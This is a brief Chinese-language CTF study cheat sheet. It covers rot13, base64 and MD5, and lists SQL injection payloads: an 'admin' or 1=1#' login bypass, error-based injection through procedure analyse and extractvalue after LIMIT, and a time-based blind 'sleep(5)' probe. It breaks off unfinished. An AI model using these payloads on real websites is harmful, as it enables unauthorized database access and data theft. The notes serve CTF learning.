CTF
f1a9:{ke7_1s_here_13ut_d0_y0u_kn0w}
http://hackinglab.cn
密码学
rot13
字母顺推13位,数字不变
e.g. : xrlvf23xfqwsxsqf (keyis23ksdjfkfds)
base64
e.g. YmFzZTY0bHNuMHRhYmFkMWRlYQ== (base64lsn0tabad1dea)
MD5
Message Digest Algorithm MD5 (消息摘要算法 第五版)
e.g. : e0960851294d7b2253978ba858e24633
SQL注入
万能密码
admin’ or 1=1#
limit位置
若加了order by 就不能从账号密码注入,但是limit在其后是可以控制的
url后面输入:
procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)%23
出现 XPATH syntax error: ‘:5.1.73’ 报错注入则证明注入点可行
宽字节注入
报错注入
https://www.waitalone.cn/mysql-error-based-injection.html
SQLMap
|
|
盲注
时间
id=1’ and sleep(5)%23
未完..